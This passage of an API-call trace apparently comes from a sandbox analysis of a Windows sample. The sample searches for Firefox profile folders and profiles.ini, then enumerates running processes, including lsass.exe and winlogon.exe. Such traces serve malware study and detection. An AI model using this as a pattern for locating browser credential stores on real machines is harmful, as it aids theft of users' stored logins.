_Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Profiles\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Profiles\\" [0254.907] wcscat (in: _Dest=0x19ac0c, _Source="*.*" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Profiles\\*.*") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Profiles\\*.*" [0254.907] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Profiles\\*.*", lpFindFileData=0x19ae94 | out: lpFindFileData=0x19ae94) returned 0xffffffff [0254.907] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x51 [0254.907] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x51 [0254.907] wcslen (_String="*.*") returned 0x3 [0254.907] wcscpy (in: _Dest=0x19ac0c, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0254.907] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x51 [0254.907] wcscat (in: _Dest=0x19ac0c, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0254.907] wcscat (in: _Dest=0x19ac0c, _Source="*.*" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*" [0254.907] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x19ae94 | out: lpFindFileData=0x19ae94) returned 0xffffffff [0254.908] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19ba98, csidl=26, fCreate=0 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 1 [0254.908] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19b258, csidl=28, fCreate=0 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 1 [0254.908] wcslen (_String="Mozilla\\Firefox\\Profiles") returned 0x18 [0254.908] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0254.908] wcscpy (in: _Dest=0x19b888, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" [0254.908] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0254.908] wcscat (in: _Dest=0x19b888, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\" [0254.908] wcscat (in: _Dest=0x19b888, _Source="Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0254.908] wcslen (_String="Mozilla\\Firefox\\Profiles") returned 0x18 [0254.908] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0254.908] wcscpy (in: _Dest=0x19b678, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" [0254.908] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0254.908] wcscat (in: _Dest=0x19b678, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\" [0254.908] wcscat (in: _Dest=0x19b678, _Source="Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles" [0254.908] wcslen (_String="Mozilla\\Firefox") returned 0xf [0254.908] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0254.908] wcscpy (in: _Dest=0x19b468, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" [0254.908] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0254.908] wcscat (in: _Dest=0x19b468, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\" [0254.908] wcscat (in: _Dest=0x19b468, _Source="Mozilla\\Firefox" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox" [0254.908] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x51 [0254.908] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x51 [0254.908] wcslen (_String="*.*") returned 0x3 [0254.909] wcscpy (in: _Dest=0x19a63c, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0254.909] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x51 [0254.909] wcscat (in: _Dest=0x19a63c, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0254.909] wcscat (in: _Dest=0x19a63c, _Source="*.*" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*" [0254.909] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x19a8c4 | out: lpFindFileData=0x19a8c4) returned 0xffffffff [0254.909] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x4f [0254.909] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x4f [0254.909] wcslen (_String="*.*") returned 0x3 [0254.909] wcscpy (in: _Dest=0x19a63c, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles" [0254.909] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x4f [0254.909] wcscat (in: _Dest=0x19a63c, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\" [0254.909] wcscat (in: _Dest=0x19a63c, _Source="*.*" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*.*") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*.*" [0254.909] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x19a8c4 | out: lpFindFileData=0x19a8c4) returned 0xffffffff [0254.909] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox") returned 0x48 [0254.909] wcslen (_String="profiles.ini") returned 0xc [0254.909] wcscpy (in: _Dest=0x19a5ec, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox" [0254.909] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox") returned 0x48 [0254.909] wcscat (in: _Dest=0x19a5ec, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\" [0254.909] wcscat (in: _Dest=0x19a5ec, _Source="profiles.ini" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" [0254.909] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\mozilla\\firefox\\profiles.ini")) returned 0xffffffff [0254.910] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x220 [0254.912] Process32FirstW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.913] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0254.914] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0254.914] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0254.914] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0254.914] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.915] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0254.915] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x190, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0254.916] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x190) returned 0x0 [0254.916] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x188, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.916] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x198) returned 0x0 [0254.916] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x188, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0254.917] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x21c [0254.917] LoadLibraryW (lpLibFileName="psapi.dll") returned 0x766e0000 [0254.995] GetProcAddress (hModule=0x766e0000, lpProcName="GetModuleBaseNameW") returned 0x766e1420 [0254.995] GetProcAddress (hModule=0x766e0000, lpProcName="EnumProcessModules") returned 0x766e13a0 [0254.995] GetProcAddress (hModule=0x766e0000, lpProcName="GetModuleFileNameExW") returned 0x766e1400 [0254.995] GetProcAddress (hModule=0x766e0000, lpProcName="EnumProcesses") returned 0x766e13c0 [0254.995] GetProcAddress (hModule=0x766e0000, lpProcName="GetModuleInformation") returned 0x766e16a0 [0254.995] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe")) returned 0x20 [0254.996] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\winlogon.exe" | out: _Dest="C:\\Windows\\System32\\winlogon.exe") returned="C:\\Windows\\System32\\winlogon.exe" [0254.996] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x765f0000 [0254.996] GetProcAddress (hModule=0x765f0000, lpProcName="GetProcessTimes") returned 0x76613700 [0254.996] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0254.996] CloseHandle (hObject=0x21c) returned 1 [0254.996] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x190, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0254.996] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0254.996] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x190, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0254.997] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x21c [0254.997] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\lsass.exe" (normalized: "c:\\windows\\system32\\lsass.exe")) returned 0x1d [0254.997] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\lsass.exe" | out: _Dest="C:\\Windows\\System32\\lsass.exe") returned="C:\\Windows\\System32\\lsass.exe" [0254.997] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0254.997] CloseHandle (hObject=0x21c) returned 1 [0254.997] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.998] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x240) returned 0x21c [0254.998] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0254.998] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\svchost.exe" | out: _Dest="C:\\Windows\\System32\\svchost.exe") returned="C:\\Windows\\System32\\svchost.exe" [0254.998] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0254.998] CloseHandle (hObject=0x21c) returned 1 [0254.998] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.998] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x260) returned 0x21c [0254.998] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0254.998] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\svchost.exe" | out: _Dest="C:\\Windows\\System32\\svchost.exe") returned="C:\\Windows\\System32\\svchost.exe" [0254.998] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0254.999] CloseHandle (hObject=0x21c) returned 1 [0254.999] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0254.999] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2cc) returned 0x21c [0254.999] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\LogonUI.exe" (normalized: "c:\\windows\\system32\\logonui.exe")) returned 0x1f [0254.999] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\LogonUI.exe" | out: _Dest="C:\\Windows\\System32\\LogonUI.exe") returned="C:\\Windows\\System32\\LogonUI.exe" [0254.999] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0254.999] CloseHandle (hObject=0x21c) returned 1 [0254.999] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0255.000] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2d4) returned 0x21c [0255.000] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\dwm.exe" (normalized: "c:\\windows\\system32\\dwm.exe")) returned 0x1b [0255.000] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\dwm.exe" | out: _Dest="C:\\Windows\\System32\\dwm.exe") returned="C:\\Windows\\System32\\dwm.exe" [0255.000] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.000] CloseHandle (hObject=0x21c) returned 1 [0255.000] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.000] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x314) returned 0x21c [0255.000] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0255.000] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\svchost.exe" | out: _Dest="C:\\Windows\\System32\\svchost.exe") returned="C:\\Windows\\System32\\svchost.exe" [0255.001] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.001] CloseHandle (hObject=0x21c) returned 1 [0255.001] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.001] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x340) returned 0x21c [0255.001] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0255.001] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\svchost.exe" | out: _Dest="C:\\Windows\\System32\\svchost.exe") returned="C:\\Windows\\System32\\svchost.exe" [0255.001] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.001] CloseHandle (hObject=0x21c) returned 1 [0255.001] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.002] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x348) returned 0x21c [0255.002] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0255.002] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\svchost.exe" | out: _Dest="C:\\Windows\\System32\\svchost.exe") returned="C:\\Windows\\System32\\svchost.exe" [0255.002] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.002] CloseHandle (hObject=0x21c) returned 1 [0255.002] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.002] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x21c [0255.002] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0255.003] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\svchost.exe" | out: _Dest="C:\\Windows\\System32\\svchost.exe") returned="C:\\Windows\\System32\\svchost.exe" [0255.003] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.003] CloseHandle (hObject=0x21c) returned 1 [0255.003] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x388, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.003] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x388) returned 0x21c [0255.003] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0255.003] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\svchost.exe" | out: _Dest="C:\\Windows\\System32\\svchost.exe") returned="C:\\Windows\\System32\\svchost.exe" [0255.003] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.003] CloseHandle (hObject=0x21c) returned 1 [0255.003] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.004] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2fc) returned 0x21c [0255.004] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0255.004] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\svchost.exe" | out: _Dest="C:\\Windows\\System32\\svchost.exe") 